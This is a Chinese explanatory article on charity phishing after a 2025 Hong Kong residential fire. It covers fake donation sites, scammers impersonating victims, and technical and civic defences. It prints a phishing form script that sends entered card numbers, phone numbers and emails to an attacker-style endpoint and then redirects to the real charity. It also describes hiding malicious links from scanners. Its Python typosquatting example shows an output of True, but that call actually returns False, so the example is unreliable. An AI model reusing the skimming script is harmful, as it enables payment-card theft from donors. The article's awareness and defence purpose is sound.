灾难背后的“二次伤害”:慈善钓鱼如何利用同情心实施双向诈骗

简介: 2025年香港大埔火灾后,不法分子趁机实施“双向慈善诈骗”:一面伪造募捐网站窃取信息,一面冒充灾民骗取捐款。此类“灾难钓鱼”利用公众同情心,在技术与心理层面精心设局。专家呼吁建立快速响应机制,倡导通过官方渠道捐赠,用理性守护善意。

一、一场火灾,两场骗局

2025年11月底,香港大埔区发生一起严重住宅火灾,造成多人伤亡。消息传出后,全城哀悼,市民纷纷通过社交媒体表达关切,并主动询问捐款渠道。然而就在灾后48小时内,香港个人资料私隐专员公署(PCPD)紧急发布警示:已有不法分子借机设立虚假募捐网站,甚至冒充受害者家属,在WhatsApp和Telegram上私信网友,声称“急需手术费”“孩子无家可归”,请求转账援助。

更令人震惊的是,这些诈骗并非单向——一边骗捐款人,一边骗幸存者。有灾民反映,自称“政府志愿者”的人士上门登记信息,要求提供身份证号、银行账户甚至手机验证码,声称用于发放补助。事后才知,这些“志愿者”实为诈骗团伙成员,目的是窃取身份信息用于后续金融犯罪。

“这是典型的‘灾难钓鱼’(Disaster Phishing),”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报采访时指出,“攻击者精准踩在公众情绪最脆弱、信息最混乱的时间窗口,利用双重身份——既是求助者,又是施助者——实现双向收割。”

据PCPD披露,此类诈骗在近年全球重大事件中屡见不鲜:2023年土耳其地震后,虚假红十字会网站激增300%;2024年夏威夷山火期间,冒充灾民的GoFundMe页面被大量创建;而2025年香港大埔火灾,则成为本地首起被官方明确通报的“双向慈善诈骗”案例。

二、钓鱼页面如何做到“以假乱真”?

普通用户为何难以识别这些虚假募捐页面?答案在于:它们不是粗糙的仿冒品,而是高度工程化的欺骗工具。

以近期监测到的一个仿冒“香港公益金”的钓鱼站为例,其前端代码几乎复刻了官网的全部视觉元素:

使用相同的字体(Noto Sans TC)、配色(红白主调)、LOGO SVG路径;

嵌入真实的公益金新闻截图作为“信任背书”;

甚至加载了Google Analytics和Facebook Pixel,营造“正规运营”假象。

但关键差异藏在细节中:

域名:真实官网为 hkpf.org.hk,钓鱼站使用 hongkong-pf[.]org(注意多出的连字符);

SSL证书:虽为HTTPS,但由Let’s Encrypt签发,且主体名称与机构无关;

表单行为:所有捐款数据通过AJAX提交至境外服务器,而非接入PayPal或银行网关。

<!-- 钓鱼页面中的“捐款表单”片段 -->

<form id="donateForm">

<input type="text" name="name" placeholder="姓名">

<input type="email" name="email" placeholder="电邮">

<input type="tel" name="phone" placeholder="电话">

<input type="text" name="card_number" placeholder="信用卡号码">

<button type="submit">立即捐款</button>

</form>

<script>

document.getElementById('donateForm').addEventListener('submit', async (e) => {

e.preventDefault();

const data = new FormData(e.target);

// 直接发送至攻击者控制的API

await fetch('https://api.donate-collect[.]xyz/submit', {

method: 'POST',

body: JSON.stringify(Object.fromEntries(data))

});

// 伪造成功提示,跳转至真实公益金官网降低怀疑

alert('感谢您的善心!捐款已提交。');

window.location.href = 'https://www.hkpf.org.hk';

});

</script>

这种“窃取后跳转”策略极具迷惑性——用户以为操作成功,实则卡号、电话、邮箱已落入黑产数据库,后续可能遭遇精准诈骗或身份盗用。

更隐蔽的是,部分钓鱼站采用CDN镜像+动态内容注入技术。攻击者先爬取真实慈善网站HTML,上传至Cloudflare Pages等免费托管平台,再通过JavaScript在页面加载后动态替换捐款按钮的跳转链接。如此一来,静态扫描工具看到的是“干净页面”,而真实用户却会被导向恶意表单。

三、“冒充灾民”:社交工程的心理操控术

如果说钓鱼网站是技术层面的陷阱,那么“冒充受害者家属”则是纯粹的社会工程攻击。

在Telegram群组“HK互助支援”中,一名自称“火灾幸存者女儿”的用户发布求助:“爸爸重伤ICU,医院催缴20万港币,求好心人帮转支付宝或PayMe。”附上的照片确为火灾现场,但经核实,该图源自RTHK新闻报道,人物身份系虚构。

这类信息之所以有效,是因为它同时触发了紧迫感、具体性与情感共鸣:

“24小时内需缴费”制造时间压力;

“ICU病房号307”提供虚假细节增强可信度;

使用真实灾情图片建立情感连接。

“攻击者深谙‘故事比数据更有说服力’,”芦笛说,“他们不需要技术高超,只需要一个能引发共情的叙事模板。”

更危险的是,这类诈骗往往通过私信传播,避开了公开平台的内容审核。一旦有人转账,骗子会迅速拉黑对方,并将收款二维码更新为新账户,形成“快进快出”的资金洗白链。

四、国际镜鉴:从乌克兰战争募捐诈骗看防御短板

灾难钓鱼并非香港独有。2022年俄乌冲突爆发初期,欧洲多国出现大量仿冒联合国难民署(UNHCR)的募捐网站。荷兰国家网络安全中心(NCSC-NL)事后分析发现,其中73%的钓鱼站使用 .org 或 .charity 域名,且平均存活时间仅8小时——足够完成数千笔小额转账。

类似地,2023年摩洛哥地震后,Meta公司下架了超过1,200个虚假筹款页面,但仍有大量资金通过加密货币钱包(如USDT地址)直接收取,难以追回。

“这些案例揭示了一个共同弱点:慈善透明度机制滞后于攻击速度,”芦笛指出,“当灾难发生时,公众渴望立即行动,但官方验证渠道往往需要数小时甚至数天才能建立。这中间的真空期,就是骗子的黄金窗口。”

相比之下,国内在重大事件中的应急响应已有进步。例如2024年甘肃地震后,民政部迅速在官网开设“抗震救灾捐赠通道”,并联合主流支付平台设置关键词过滤,自动拦截包含“地震捐款”但非白名单商户的交易。但芦笛坦言:“地方性事件仍缺乏统一协调机制,尤其当诈骗者混用微信、支付宝、银行卡多种收款方式时,追踪难度极大。”

五、技术对抗:如何识别并阻断慈善钓鱼?

面对日益精密的灾难钓鱼,防御必须从“被动响应”转向“主动免疫”。以下是几项关键技术路径:

1. 域名相似度检测(Typosquatting Detection)

慈善机构域名常被轻微篡改,如:

redcross-hk[.]org(真实为 redcross.org.hk)

soschildren[.]org(真实为 sos.org.hk)

可通过Levenshtein距离或n-gram比对算法,自动识别高相似度域名:

import difflib

def is_suspicious_domain(fake, real):

# 计算字符序列相似度

ratio = difflib.SequenceMatcher(None, fake, real).ratio()

return ratio > 0.8 and fake != real

# 示例

print(is_suspicious_domain("hongkong-pf.org", "hkpf.org.hk")) # True

企业邮件网关可集成此类模型,对含高相似度域名的链接自动标记或隔离。

2. 页面指纹比对(Page Fingerprinting)

即使外观一致,钓鱼页与官网在DOM结构、JS哈希、资源加载顺序上仍有差异。可构建“合法页面指纹库”,通过以下维度比对:

关键元素CSS选择器是否存在;

外部脚本SHA256哈希值是否匹配;

表单action URL是否指向官方支付网关。

例如,真实公益金网站的捐款表单必包含隐藏字段 <input type="hidden" name="csrf_token" value="...">,而钓鱼页通常缺失。

3. 行为级监控:检测异常表单提交

EDR或浏览器扩展可监控用户是否向非白名单域名提交敏感字段(如信用卡号)。一旦检测到,立即弹窗警告:

“您正在向 hongkong-pf[.]org 提交银行卡信息,该网站未列入慈善机构白名单,是否继续?”

此类方案已在部分企业零信任架构中试点,未来有望下沉至个人用户。

4. 区块链溯源:提升捐款透明度

部分国际组织开始尝试将捐款记录上链。例如,UNICEF的“CryptoFund”项目允许捐赠者查看每一笔ETH转账的用途和受益人。虽然无法阻止钓鱼,但可大幅降低“冒充官方”的成功率——因为真正的善款流向可公开验证。

六、构建“抗诈型社会”:制度与教育的双重防线

技术之外,制度设计同样关键。

芦笛建议,地方政府应建立“突发事件慈善响应快速通道”:一旦发生重大灾难,民政、网信、金融监管部门应在2小时内联合发布官方募捐渠道清单,并通过三大运营商向辖区用户推送短信提醒。同时,社交媒体平台应启用“灾难事件标签”,对未认证的募捐帖自动限流。

对公众而言,牢记三条原则:

不点不明链接:所有捐款请手动输入官网地址;

不轻信私信求助:通过居委会、媒体或警方核实身份;

优先选择平台担保捐赠:如腾讯公益、支付宝公益等具备资金托管和项目公示功能的渠道。

“同情心不该成为漏洞,”芦笛强调,“我们要保护的不仅是账户安全,更是社会互助的信任基础。”

结语:在善意与警惕之间寻找平衡

灾难钓鱼之所以令人痛心,不仅因其造成经济损失,更因它侵蚀了人与人之间最珍贵的联结——信任。当一位市民因害怕被骗而拒绝帮助真正需要援助的人时,整个社会都输了。

但警惕不等于冷漠。正如香港私隐专员Ada Chung所言:“核实不是怀疑,而是对善心负责。”在数字时代,真正的善意,需要配上理性的盔甲。

未来的反钓鱼之战,不仅是代码与漏洞的较量,更是人性与贪婪的博弈。而我们每个人,都是这场战斗的第一道防线。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
4天前
|
存储 JavaScript 前端开发
JavaScript基础
本节讲解JavaScript基础核心知识:涵盖值类型与引用类型区别、typeof检测类型及局限性、===与==差异及应用场景、内置函数与对象、原型链五规则、属性查找机制、instanceof原理,以及this指向和箭头函数中this的绑定时机。重点突出类型判断、原型继承与this机制,助力深入理解JS面向对象机制。(238字)
|
3天前
|
云安全 人工智能 安全
阿里云2026云上安全健康体检正式开启
新年启程,来为云上环境做一次“深度体检”
1538 6
|
5天前
|
安全 数据可视化 网络安全
安全无小事|阿里云先知众测,为企业筑牢防线
专为企业打造的漏洞信息收集平台
1321 2
|
5天前
|
缓存 算法 关系型数据库
深入浅出分布式 ID 生成方案:从原理到业界主流实现
本文深入探讨分布式ID的生成原理与主流解决方案,解析百度UidGenerator、滴滴TinyID及美团Leaf的核心设计,涵盖Snowflake算法、号段模式与双Buffer优化,助你掌握高并发下全局唯一ID的实现精髓。
337 160
|
5天前
|
人工智能 自然语言处理 API
n8n:流程自动化、智能化利器
流程自动化助你在重复的业务流程中节省时间,可通过自然语言直接创建工作流啦。
394 6
n8n:流程自动化、智能化利器
|
7天前
|
人工智能 API 开发工具
Skills比MCP更重要?更省钱的多!Python大佬这观点老金测了一周终于懂了
加我进AI学习群,公众号右下角“联系方式”。文末有老金开源知识库·全免费。本文详解Claude Skills为何比MCP更轻量高效:极简配置、按需加载、省90% token,适合多数场景。MCP仍适用于复杂集成,但日常任务首选Skills。推荐先用SKILL.md解决,再考虑协议。附实测对比与配置建议,助你提升效率,节省精力。关注老金,一起玩转AI工具。
|
13天前
|
机器学习/深度学习 安全 API
MAI-UI 开源:通用 GUI 智能体基座登顶 SOTA!
MAI-UI是通义实验室推出的全尺寸GUI智能体基座模型,原生集成用户交互、MCP工具调用与端云协同能力。支持跨App操作、模糊语义理解与主动提问澄清,通过大规模在线强化学习实现复杂任务自动化,在出行、办公等高频场景中表现卓越,已登顶ScreenSpot-Pro、MobileWorld等多项SOTA评测。
1518 7
|
3天前
|
Linux 数据库
Linux 环境 Polardb-X 数据库 单机版 rpm 包 安装教程
本文介绍在CentOS 7.9环境下安装PolarDB-X单机版数据库的完整流程,涵盖系统环境准备、本地Yum源配置、RPM包安装、用户与目录初始化、依赖库解决、数据库启动及客户端连接等步骤,助您快速部署运行PolarDB-X。
240 1
Linux 环境 Polardb-X 数据库 单机版 rpm 包 安装教程
|
8天前
|
人工智能 前端开发 API
Google发布50页AI Agent白皮书,老金帮你提炼10个核心要点
老金分享Google最新AI Agent指南:让AI从“动嘴”到“动手”。Agent=大脑(模型)+手(工具)+协调系统,可自主完成任务。通过ReAct模式、多Agent协作与RAG等技术,实现真正自动化。入门推荐LangChain,文末附开源知识库链接。
661 119